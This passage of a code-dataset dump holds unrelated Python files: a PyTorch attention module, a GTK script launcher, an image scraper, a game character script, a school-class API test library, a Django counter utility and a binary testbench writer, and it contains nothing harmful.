F.tanh(self.linear_out(combined.view(-1, 2 * hidden_size))).view(batch_size, -1, hidden_size)\n\n return output, attn\n\n# Bahdanau Attention\nclass Attention_Bahdanau(nn.Module):\n def __init__(self, dim):\n super(Attention_Bahdanau, self).__init__()\n self.linear_out = nn.Linear(dim*2, dim)\n self.v = nn.Parameter(torch.rand(dim))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n def forward(self, hidden, encoder_outputs, src_len=None):\n # hidden.shape = layer * batch_size * hidden_size\n # encoder_outputs = batch_size * in_len * hidden_size\n max_len = encoder_outputs.size(1)\n batch_size = encoder_outputs.size(0)\n # H = batch_size * in_len * hidden_size\n H = hidden.repeat(max_len,1,1).transpose(0,1)\n attn_energies = self.score(H, encoder_outputs)\n\n if src_len is not None:\n mask = []\n for b in range(src_len.size(0)):\n mask.append([0] * src_len[b].item() + [1] * (encoder_outputs.size(1) - src_len[b].item()))\n mask = cuda_(torch.ByteTensor(mask).unsqueeze(1)) # [B,1,T]\n attn_energies = attn_energies.masked_fill(mask, -1e18)\n\n return F.softmax(attn_energies.view(-1, max_len), dim=1).view(batch_size, 1, -1)\n\n def score(self, hidden, encoder_outputs):\n # (batch, out_len, 2*hidden) -> (batch, out_len, hidden)\n # energy = batch_size * in_len * hidden_size\n energy = torch.tanh(self.linear_out(torch.cat([hidden, encoder_outputs], 2)))\n energy = energy.transpose(2,1) # [B*H*T]\n v = self.v.repeat(encoder_outputs.data.shape[0],1).unsqueeze(1) #[B*1*H]\n energy = torch.bmm(v,energy) # [B*1*T]\n return energy\n","sub_path":"Seq2seq/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"459749224","text":"APPNAME = \"Third Hand\"\nVERSION = \"v1.0\"\n\nimport os\nimport sys\nimport multiprocessing\nimport time\nimport gtk\n\nsys.path.append(os.path.dirname(os.path.realpath(sys.argv[0])) + \"/scripts/\")\n\n\nclass ScriptHandler:\n def __init__(self):\n self.running = True\n self.scripts = []\n scripts_dict = self.import_scripts(os.path.dirname(os.path.realpath(sys.argv[0])) + \"/scripts/\")\n for d in scripts_dict:\n self.scripts.append(Script(d))\n self.threads = []\n self.start_threads()\n\n def get_scripts_menu_items(self):\n ret = []\n if len(self.scripts) > 0:\n for sc in self.scripts:\n i = gtk.CheckMenuItem(sc.name)\n i.set_active(self.is_running(sc))\n ret.append(i)\n else:\n i = gtk.MenuItem(\"No scripts\")\n i.set_sensitive(False)\n ret.append(i)\n return ret\n\n def is_running(self, script):\n for t in self.threads:\n if t.script.name == script.name:\n return True\n return False\n\n def import_scripts(self, dir):\n library_list = []\n for f in os.listdir(dir):\n module_name, ext = os.path.splitext(f) # Handles no-extension files, etc.\n if ext == '.py': # Important, ignore .pyc/other files.\n module = __import__(module_name)\n library_list.append(module)\n return library_list\n\n def start_threads(self):\n for sc in self.scripts:\n if sc.startup is True:\n t = ScriptThread(sc)\n t.start()\n self.threads.append(t)\n\n def kill_threads(self):\n for t in self.threads:\n t.stop()\n\n def activate(self, n):\n for sc in self.scripts:\n if sc.name == n:\n t = ScriptThread(sc)\n t.start()\n self.threads.append(t)\n\n def desactivate(self, n):\n for t in self.threads:\n if t.script.name == n:\n t.stop()\n t.p.terminate()\n self.threads.remove(t)\n\n\nclass Script:\n def __init__(self, module):\n self.module = module\n self.name = module.name\n self.timer = module.timer\n self.startup = module.startup\n\n def begin(self):\n self.module.begin()\n\n def do(self):\n self.module.do()\n\n def end(self):\n self.module.end()\n\n\nclass ScriptThread:\n def __init__(self, script):\n self.p = multiprocessing.Process(target=self.run)\n self.script = script\n self.running = True\n\n def start(self):\n self.p.start()\n\n def run(self):\n self.script.begin()\n while self.running:\n self.script.do()\n time.sleep(self.script.timer * 0.001)\n\n def stop(self):\n self.script.end()\n self.running = False\n\n\ndef make_menu(event_button, event_time, data=None):\n menu = gtk.Menu()\n for i in script_handler.get_scripts_menu_items():\n i.connect(\"activate\", on_script_click)\n menu.append(i)\n i.show()\n sep = gtk.SeparatorMenuItem()\n menu.append(sep)\n sep.show()\n close_item = gtk.MenuItem(\"Quit\")\n close_item.connect_object(\"activate\", close_app, \"Close App\")\n menu.append(close_item)\n close_item.show()\n menu.popup(None, None, None, event_button, event_time)\n\ndef on_script_click(widget):\n if widget.active is False:\n script_handler.desactivate(widget.get_label())\n else:\n script_handler.activate(widget.get_label())\n\ndef on_right_click(data, event_button, event_time):\n make_menu(event_button, event_time)\n\ndef close_app(data=None):\n script_handler.kill_threads()\n gtk.main_quit()\n\n\nif __name__ == '__main__':\n script_handler = ScriptHandler()\n icon = gtk.status_icon_new_from_stock(gtk.STOCK_EXECUTE)\n icon.connect('popup-menu', on_right_click)\n icon.set_has_tooltip(True)\n icon.set_tooltip_text(APPNAME + \" | \" + VERSION)\n gtk.main()","sub_path":"thirdhand.py","file_name":"thirdhand.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"93291580","text":"from urllib import request\nimport threading\nfrom time import sleep,ctime\nfrom html import parser\n\ndef down_img( filepath,FileName =\"default.jpg\" ):\n try:\n imgpage = request.urlopen( filepath)\n print(\"访问网络文件\"+filepath+\"n\")\n img = imgpage.read()\n print(\"保存文件\"+FileName+\"n\")\n try:\n File = open(FileName,\"wb\" )\n File.write(img)\n File.close()\n return\n except IOError:\n print(\"errorn\")\n return\n except Exception:\n print(\"errorn\")\n return\n\ndef down_img_thread( filepathlist ):\n print(\"共有%d个文件需要下载\"%len(filepathlist))\n for file in filepathlist:\n print( file )\n print(\"开始多线程下载\")\n down_threads=[] #存储线程\n count=1\n for file in filepathlist:\n time = threading.Thread( target=down_img,args=(file,\"%d.jpg\"%count) )\n count = count + 1\n down_threads.append(time)\n for down in down_threads:\n down.start()\n for down in down_threads:\n down.join() #等待所有线程结束\n print(\"线程结束\")\n\nclass parserLinks( parser.HTMLParser):\n filelist=[]\n def handle_starttag(self,tag,attrs):\n if tag == 'img':\n for name,value in attrs:\n if name == 'src':\n print( value)\n self.filelist.append(value)\n #print( self.get_starttag_text() )\n def get_file_list(self):\n return self.filelist\n\n\ndef main(WebUrl):\n if __name__ == \"__main__\":\n lparser = parserLinks()\n imgpage = request.urlopen( WebUrl )\n for context in imgpage.readlines():\n _str=\"%s\"%context\n try:\n lparser.feed( _str)\n except parser.HTMLParseError:\n pass\n imgpage.close()\n imagelist= lparser.get_file_list()\n down_img_thread( imagelist) \nWebUrl=\"https://cn.bing.com/images/search?q=%e7%be%8e%e5%a5%b3%e7%bd%91&qpvt=%e7%be%8e%e5%a5%b3%e7%bd%91\"\nmain(WebUrl)\n","sub_path":"Img_download/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"534352881","text":"###############################################################################\n#\tFilename:\tSaffi.py\n#\t\n#\tConfidential and Proprietary, Copyright 2000 by Totally Games\n#\t\n#\tLoads Saffi Larsen, XO, and configures animations.\n#\t\n#\tCreated:\t3/28/00 -\tErik Novales\n###############################################################################\n\nimport App\nimport CharacterPaths\n\n#NonSerializedObjects = ( \"debug\", )\n\n#debug = App.CPyDebug(__name__).Print\n\n###############################################################################\n#\tCreateCharacter()\n#\n#\tCreate Saffi by building her character and placing her on the passed in set.\n#\tCreate her menus as well.\n#\n#\tArgs:\tpSet\t- the Set in which to place ourselves\n#\n#\tReturn:\tnone\n###############################################################################\ndef CreateCharacter(pSet):\n#\tdebug(\"Creating Saffi\")\n\n\tif (pSet.GetObject(\"XO\") != None):\n\t\treturn(App.CharacterClass_Cast(pSet.GetObject(\"XO\")))\n\tCharacterPaths.UpdatePaths()\n\t# Create the character\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", \"Bip01\")\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", None)\n\tppromSaffi = App.CharacterClass_Create(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", CharacterPaths.g_pcHeadNIFPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", 1)\n\tppromSaffi.ReplaceBodyAndHead(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_body.tga\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\n\tppromSaffi.SetCharacterName(\"Saffi\")\n\n\t# Add the character to the set\n\tpSet.AddObjectToSet(ppromSaffi, \"XO\")\n\tpLight = pSet.GetLight(\"ambientlight1\")\n\tpLight.AddIlluminatedObject(ppromSaffi)\n\n\t# Setup the character configuration\n\tppromSaffi.SetSize(App.CharacterClass.MEDIUM)\n\tppromSaffi.SetGender(App.CharacterClass.FEMALE)\n\tppromSaffi.SetRandomAnimationChance(.75)\n\tppromSaffi.SetBlinkChance(0.1)\n\tppromSaffi.SetDatabase(\"data/TGL/Bridge Crew General.tgl\")\n\n\t# Load Saffi's general dialogue lines.\n\tLoadSounds()\n\n\tppromSaffi.AddFacialImage(\"Blink0\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"Blink1\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"Blink2\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.SetBlinkStages(3)\n\n\tppromSaffi.AddFacialImage(\"SpeakA\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"SpeakE\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.AddFacialImage(\"SpeakU\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tppromSaffi.SetAnimatedSpeaking(1)\n\n\tpMenusDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Menus.tgl\")\n\tpTop = App.TopWindow_GetTopWindow()\n\tpTacticalControlWindow = App.TacticalControlWindow_GetTacticalControlWindow()\n\tppromSaffi.SetMenu(pTacticalControlWindow.FindMenu(pMenusDatabase.GetString(\"Commander\")))\n\tApp.g_kLocalizationManager.Unload(pMenusDatabase)\n\n#\tdebug(\"Finished creating Saffi\")\n\treturn ppromSaffi\n\n\n###############################################################################\n#\tConfigureForShip()\n#\n#\tConfigure ourselves for the particular ship object. This involves setting\n#\tup range watchers that tell us how to report.\n#\n#\tArgs:\tpSet\t- the Set object\n#\t\t\tpShip\t- the player's ship (ShipClass object)\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForShip(pSet, pShip):\n\t# Get our character object\n\tppromSaffi = App.CharacterClass_Cast(pSet.GetObject(\"XO\"))\n\tif (ppromSaffi == None):\n#\t\tdebug(\"******* Commanding officer not found *********\")\n\t\treturn\n\n#\tdebug(\"Attaching menu to XO..\")\n\timport Bridge.XOCharacterHandlers\n\tBridge.XOCharacterHandlers.AttachMenuToXO(ppromSaffi)\n\n\t#\n\t# This is where code to set up responses based on the ships state\n\t# e.g. \"Main power back on line\"\n\t#\n\n###############################################################################\n#\tConfigureForprometheus()\n#\n#\tConfigure ourselves for the prometheus bridge\n#\n#\tArgs:\tppromSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForprometheus(ppromSaffi):\n#\tdebug(\"Configuring Saffi for the prometheus bridge\")\n\n\t# Clear out any old animations from another configuration\n\tppromSaffi.ClearAnimations()\n\n\t# Register animation mappings\n\tppromSaffi.AddAnimation(\"SeatedpromCommander\", \"Bridge.Characters.promMediumAnimations.promPlaceAtC\")\n\tppromSaffi.AddAnimation(\"StandingpromCommander\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tppromSaffi.AddAnimation(\"EBL1MToEBCommander\", \"Bridge.Characters.promMediumAnimations.EBMoveFromL1ToC\")\n\tppromSaffi.AddAnimation(\"EBCommanderToL1\", \"Bridge.Characters.promMediumAnimations.EBMoveFromCToL1\")\n\tppromSaffi.AddAnimation(\"EBCommanderToC1\", \"Bridge.Characters.promMediumAnimations.EBMoveFromCToC1\")\n\tppromSaffi.AddAnimation(\"EBCommander1ToC\", \"Bridge.Characters.promMediumAnimations.EBMoveFromC1ToC\")\n\tppromSaffi.AddAnimation(\"promCommanderTurnCaptain\", \"Bridge.Characters.promMediumAnimations.promTurnAtCTowardsCaptain\")\n\tppromSaffi.AddAnimation(\"promCommanderBackCaptain\", \"Bridge.Characters.promMediumAnimations.promTurnBackAtCFromCaptain\")\n\n\tppromSaffi.AddAnimation(\"promCommanderGlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tppromSaffi.AddAnimation(\"promCommanderGlanceAwayCaptain\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"promCommander1GlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tppromSaffi.AddAnimation(\"promCommander1GlanceAwayCaptain\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\tppromSaffi.AddAnimation(\"EBCommanderTurnE\", \"Bridge.Characters.promMediumAnimations.EBCTalkE\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackE\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnH\", \"Bridge.Characters.promMediumAnimations.EBCTalkH\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackH\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnT\", \"Bridge.Characters.promMediumAnimations.EBCTalkT\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackT\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"EBCommanderTurnS\", \"Bridge.Characters.promMediumAnimations.EBCTalkS\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackS\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\tppromSaffi.AddAnimation(\"EBCommanderTurprom\", \"Bridge.Characters.promMediumAnimations.EBCTalkE\")\n\tppromSaffi.AddAnimation(\"EBCommanderBackX\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\n\t# Breathing\n\tppromSaffi.AddAnimation(\"promCommanderBreathe\", \"Bridge.Characters.promMediumAnimations.promseatedm\")\n\tppromSaffi.AddAnimation(\"promCommander1Breathe\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tppromSaffi.AddAnimation(\"promCommanderBreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\tppromSaffi.AddAnimation(\"promCommander1BreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\n\t# Interaction\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.promMediumAnimations.promCConsoleInteraction\", App.CharacterClass.SITTING_ONLY, 25, 1)\n\tppromSaffi.AddAnimation(\"PushingButtons\", \"Bridge.Characters.promMediumAnimations.promCConsoleInteraction\")\n\n\t# Hit animations\n\tppromSaffi.AddAnimation(\"promCommanderHit\", \"Bridge.Characters.promMediumAnimations.promCHit\")\n\tppromSaffi.AddAnimation(\"promCommanderHitHard\", \"Bridge.Characters.promMediumAnimations.promCHitHard\")\n\t#ppromSaffi.AddAnimation(\"EBCommanderHitStanding\", \"Bridge.Characters.CommonAnimations.HitStanding\")\n\t#ppromSaffi.AddAnimation(\"EBCommanderHitHardStanding\", \"Bridge.Characters.CommonAnimations.HitHardStanding\")\n\tppromSaffi.AddAnimation(\"promCommanderReactLeft\", \"Bridge.Characters.CommonAnimations.ReactLeft\")\n\tppromSaffi.AddAnimation(\"promCommanderReactRight\", \"Bridge.Characters.CommonAnimations.ReactRight\")\n\n\t# Add common animations.\n\tAddCommonAnimations(ppromSaffi)\n\tppromSaffi.SetStanding(0)\n\tppromSaffi.SetLocation(\"promCommander\")\n\tppromSaffi.AddPositionZoom(\"promCommander\", 0.55)\n#\tdebug(\"Finished configuring Saffi\")\n\n###############################################################################\n#\tAddCommonAnimations()\n#\n#\tSince we can only clear out all animations when switching bridges (how\n#\twould we know which not to clear?), we can't really setup animations common\n#\tto all bridge configurations as we might like. Because of this we have a\n#\troutine to add common animations (most of which are randoms) that both\n#\tconfigurations will call\n#\n#\tArgs:\tppromSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef AddCommonAnimations(ppromSaffi):\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.promMediumAnimations.CLookAroundConsoleDown\", App.CharacterClass.SITTING_ONLY, 1, 1)\n\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadLeft\")\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadRight\")\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookLeft\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookRight\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookUp\", App.CharacterClass.SITTING_ONLY)\n\tppromSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookDown\", App.CharacterClass.SITTING_ONLY)\n\n###############################################################################\n#\tLoadSounds\n#\t\n#\tLoad any of Saffi's general or spontaneous sounds, so they don't\n#\thitch the game when they're played.\n#\t\n#\tArgs:\tNone\n#\t\n#\tReturn:\tNone\n###############################################################################\ndef LoadSounds():\n\tpGame = App.Game_GetCurrentGame()\n\tpDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Crew General.tgl\")\n\t\n\t#\n\t# Build a list of sound to load\n\t#\n\tlSoundList =\t[\n\t\t# Yes?\n\t\t\"gf001\",\n\t\t\"gf002\",\n\n\t\t# Report.\n\t\t\"gf020\",\n\n\t\t# Alert lines.\n\t\t\"GreenAlert\",\n\t\t\"GreenAlert2\",\n\t\t\"GreenAlert3\",\n\t\t\"YellowAlert\",\n\t\t\"YellowAlert3\",\n\t\t\"YellowAlert2\",\n\t\t\"RedAlert\",\n\t\t\"RedAlert2\",\n\n\t\t# Contacting starfleet.\n\t\t\"gl004\",\n\t\t\"gl005\",\n\t\t\t\t\t]\n\t#\n\t# Loop through that list, loading each sound in the \"BridgeGeneric\" group\n\t#\n\tfor sLine in lSoundList:\n\t\tpGame.LoadDatabaseSoundInGroup(pDatabase, sLine, \"BridgeGeneric\")\n\n\tApp.g_kLocalizationManager.Unload(pDatabase)\n","sub_path":"scripts/Bridge/Characters/promSaffi.py","file_name":"promSaffi.py","file_ext":"py","file_size_in_byte":10803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69834356","text":"from cv2 import cv2\nfrom diffCalculation import diff_functions\nimport time\n\n\ndef main():\n video_source = cv2.VideoCapture('test_video.avi')\n frame1 = None\n frame2 = None\n optical_flow_calculator = diff_functions.DiffOpticalFlow()\n while video_source.grab():\n frame2 = frame1\n flag, frame1 = video_source.retrieve()\n frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n if frame1 is not None:\n cv2.imshow('video1', frame1)\n if frame2 is not None:\n cv2.imshow('video2', frame2)\n cv2.waitKey(1)\n\n if frame1 is not None and frame2 is not None:\n start_time = time.time()\n result = optical_flow_calculator.get_optical_flow(frame1, frame2, block_size=[16, 16])\n print(time.time() - start_time)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620122243","text":"# -*-coding:utf-8 -*-\nimport requests\nfrom cfg import g_vcode\n\nfrom pprint import pprint\nfrom robot.libraries.BuiltIn import BuiltIn\nfrom robot.api import logger\n\nclass SchoolClassLib:\n URL = \"http://ci.ytesting.com/api/3school/school_classes\"\n\n # 列出班级\n def list_school_class(self,gradeid=None):\n\n params = {\n 'vcode': g_vcode,\n 'action': 'list_classes_by_schoolgrade',\n }\n if gradeid != None:\n params['gradeid'] = int(gradeid)\n\n\n response = requests.get(self.URL, params=params)\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2) #indent=2缩进等于二\n return bodyDict\n\n\n\n # 添加班级\n #加参数idSaveName,获取返回id\n def add_school_class(self,gradeid,name,studentlimit,idSaveName=None):\n payload = {\n 'vcode': g_vcode,\n 'action': 'add',\n 'grade': int(gradeid),\n 'name': name,\n 'studentlimit': int(studentlimit),\n }\n\n response=requests.post(self.URL,data=payload)\n bodyDict=response.json()\n pprint(bodyDict,indent=2)\n\n # #idSaveName传值时,需要获取并保存\n # if idSaveName:\n # BuiltIn().set_global_variable('${%s}'%idSaveName,bodyDict['id'])\n\n return bodyDict\n\n\n #修改学生\n def modify_school_class(self,classid,newname,newstudentlimit):\n payload={\n 'vcode':g_vcode,\n 'action':'modify',\n 'name':newname,\n 'studentlimit':int(newstudentlimit)\n }\n\n url='{}/{}'.format(self.url,classid)\n\n response=requests.put(url,data=payload)\n\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2)\n return bodyDict\n\n\n\n #删除学生\n def delete_school_class(self,classid):\n payload={\n 'vcode':g_vcode,\n }\n\n url='{}/{}'.format(self.URL,classid)\n\n response=requests.delete(url,data=payload)\n\n bodyDict=response.json()\n\n pprint(bodyDict,indent=2)\n return bodyDict\n\n\n\n #删除所有学生\n def delete_all_school_classes(self):\n #列出所有班级\n rd = self.list_school_class()\n pprint(rd,indent=2)\n\n #删除列出的所有班级\n for one in rd['retlist']:\n self.delete_school_class(one['id'])\n\n rd = self.list_school_class()\n pprint(rd, indent=2)\n\n #仍有班级,报异常\n if rd['retlist']!=[]:\n raise Exception(\"cannnot delete all school classes!\")\n\n def classlist_should_contain(self,\n classlist,\n classname,\n gradename,\n invitecode,\n studentlimit,\n studentnumber,\n classid,\n expectedtimes=1\n ):\n\n item = {\n \"name\": classname,\n \"grade__name\": gradename,\n \"invitecode\": invitecode,\n \"studentlimit\": int(studentlimit),\n \"studentnumber\": int(studentnumber),\n \"id\": classid,\n \"teacherlist\": []\n }\n\n occurTimes = classlist.count(item)\n logger.info('occur {} times'.format(occurTimes))\n\n if occurTimes != expectedtimes:\n # 通过抛出异常来让关键字Fail\n\n raise Exception(\n 'class list contain your class info {} times,expect {} times!!'.format(\n occurTimes, expectedtimes)\n )\n\n\n\n def classlist_should_not_contain(self,\n classlist,\n classname,\n gradename,\n invitecode,\n studentlimit,\n studentnumber,\n classid\n ):\n\n item = {\n \"name\": classname,\n \"grade__name\": gradename,\n \"invitecode\": invitecode,\n \"studentlimit\": int(studentlimit),\n \"studentnumber\": int(studentnumber),\n \"id\": classid,\n \"teacherlist\": []\n }\n\n occurTimes = classlist.count(item)\n logger.info('occur {} times'.format(occurTimes))\n\n if occurTimes > 0:\n # 通过抛出异常来让关键字Fail\n\n raise Exception('班级包含了指定班级信息')\n\n\n\n\nif __name__ == '__main__':\n scm = SchoolClassLib()\n\n # ret1 = scm.list_school_class(1)\n\n ret2 = scm.add_school_class(1,'1班',60)\n\n ret3 = scm.list_school_class(1)\n\n ret4 = scm.delete_all_school_classes()","sub_path":"Project-practice/spj01/pylib/SchoolClassLib.py","file_name":"SchoolClassLib.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78841692","text":"from datetime import datetime, timedelta\n\nfrom core.sites import PERIODS\nfrom core.models import Article\n\n\ndef articles_counters_for_periods(site_name):\n \"\"\"\n Returns the quantity of articles for each time period,\n e. g. {'ALL': 93, 'TODAY': 2, 'YESTERDAY': 14, 'WEEK': 23, 'MONTH': 54}\n \"\"\"\n today = datetime.today().date()\n today = datetime(year=today.year, month=today.month, day=today.day)\n today_count = Article.objects.filter(site__name=site_name, timestamp__gte=today).count()\n\n all_count = Article.objects.filter(site__name=site_name).count()\n\n yesterday = (today - timedelta(days=1)).date()\n yesterday_count = Article.objects.filter(\n site__name=site_name, timestamp__gte=yesterday, timestamp__lt=today).count()\n\n monday = today - timedelta(days=today.weekday())\n week_start = datetime(year=monday.year, month=monday.month, day=monday.day)\n week_count = Article.objects.filter(site__name=site_name, timestamp__gte=week_start).count()\n\n month_start = today - timedelta(days=today.day-1)\n month_start = datetime(year=month_start.year, month=month_start.month, day=month_start.day)\n month_count = Article.objects.filter(site__name=site_name, timestamp__gte=month_start).count()\n\n return tuple(zip(PERIODS, (all_count, today_count, yesterday_count, week_count, month_count)))\n","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339291850","text":"#!/usr/bin/python3\n\"\"\"\nDate: 12/19/2018\nVersion: 2.1.1\nAuthor: Kang Chuanliang\nSummary:\n\n\"\"\"\nimport re, sys, os, struct\nimport json\nimport bs4\nimport time\nfrom importlib import util\nif util.find_spec(\"filebrowser\"):\n\tfrom filebrowser.sites import site\n\tDIRECTORY = os.path.join(site.storage.location, \"uploads\") # /path/to/mysite/uploads/\nelse:\n\tprint(\"filebrowser not find!\")\n\tDIRECTORY = sys.path[0] # os.path.join(sys.path[0], 'uploads')\n\n# import timeit\n\nPROJECT_PATH = '' # /mysite/uploads/project/\nINCLUDE_PATH = 'include' # /mysite/tools/include/\n\n# define operation code here\n# MASK_OP = 0x1\n# BITSTREAM_OP = 0x2\n# TESTBENCH_OP = 0x4\n# END_OP = 0x80\nMASK_OP = b'\\x01'\nBITSTREAM_OP = b'\\x02'\nTESTBENCH_OP = b'\\x04'\nEND_OP = b'\\x80'\n# enddefine\n\n# define other global constants\nBIN_WIDTH = 128\nBIN_BYTE_WIDTH = int(BIN_WIDTH / 8)\nBITSTREAM_WIDTH = 32\nDEFAULT_SR = 1 # Default sample rate\n# end define\n\n\"\"\"Tools\"\"\"\n\n\ndef timer(func):\n\t# decorator without parameter\n\tdef _timer(self):\n\t\tstart_time = time.time()\n\t\tfunc(self)\n\t\tend_time = time.time()\n\t\tprint(\"\\nTotal time: \" + str(end_time - start_time))\n\n\treturn _timer\n\n\ndef name_check(file, name):\n\tfilename = os.path.splitext(file)[0]\n\tif filename == name:\n\t\tprint(file + \" name check pass!\")\n\telse:\n\t\tprint(file + \" name mismatch!\")\n\n\ndef get_soup(path, file):\n\tpath = os.path.join(path, file)\n\t# print(path)\n\twith open(path, \"r\") as f:\n\t\tsoup = bs4.BeautifulSoup(f.read(), \"xml\")\n\treturn soup\n\n\ndef txt2pio_ucf(txt, pio, ucf):\n\twith open(txt, 'r') as ft, open(pio, 'w') as fp, open(ucf, 'w') as fu:\n\t\tregex = re.compile(r'(input|output)s\\[\"(.*)\"\\]\\s+=\\s+(.*)')\n\t\tfor line in ft.readlines():\n\t\t\tm = regex.match(line)\n\t\t\tif m:\n\t\t\t\tline_pio = 'NET \"{}\" DIR = {};\\n'.format(m.group(2), m.group(1))\n\t\t\t\tline_ucf = 'NET \"{}\" LOC = {};\\n'.format(m.group(2), m.group(3))\n\t\t\t\tfp.write(line_pio)\n\t\t\t\tfu.write(line_ucf)\n\n\n\"\"\"Write operation, mask, or testbench\"\"\"\n\n\ndef write_content(fw, pos_dict, base=[0]*16):\n\tif not pos_dict:\n\t\treturn\n\tnumbers = base[:]\n\t# print(numbers)\n\tfor key, value in pos_dict.items():\n\t\tif key:\n\t\t\tnumbers[key[0] - 1] += 2 ** key[1] * int(value)\n\t\t# numbers[key[0]-1] += int(value) << key[1] # shift operation is faster?\n\tfor num in numbers:\n\t\t# fw.write(struct.pack('B', num))\n\t\tif num:\n\t\t\tcontent = struct.pack('B', num)\n\t\telse:\n\t\t\tcontent = b'\\x00'\n\t\tfw.write(content)\n\n\ndef write_operator(fw, operator, length):\n\tfw.write(operator + b'\\xff' * 11 + struct.pack('>I', length))\n\t# fw.write(operator) # 1 byte\n\t# # for i in range(11): # length takes 4 bytes\n\t# # \tfw.write(struct.pack('B', 0xff))\n\t# fw.write(b'\\xff' * 11)\n\t# fw.write(struct.pack('>I', length)) # 4 bytes, big-endian\n\n\ndef write_tb_op(fw, tb_counter):\n\tif tb_counter:\n\t\toffset = - int((tb_counter + 1) * BIN_BYTE_WIDTH)\n\t\tfw.seek(offset, 1) # locate the beginning of testbench\n\t\twrite_operator(fw, TESTBENCH_OP, tb_counter)\n\t\tfw.seek(0, 2) # return to end of file\n\n\ndef write_length(fw, length):\n\tif length:\n\t\toffset = - int(length * BIN_BYTE_WIDTH + 4)\n\t\tfw.seek(offset, 1) # locate the beginning of testbench\n\t\tfw.write(struct.pack('>I', length))\n\t\tfw.seek(0, 2) # return to end of file\n\n\ndef write_mask(fw, sig2pos, sig2pio): # static\n\tnumbers = [0xff] * 16\n\twrite_operator(fw, MASK_OP, 1)\n\tfor key, value in sig2pos.items():\n\t\tif sig2pio.setdefault(key, None) == 'input': # TODO: maybe value in pio_dict should be 0/1?\n\t\t\tnumbers[value[0] - 1] -= 2 ** value[1]\n\tfor num in numbers:\n\t\tfw.write(struct.pack('B', num))\n\n\ndef get_sig_value(dictionary, 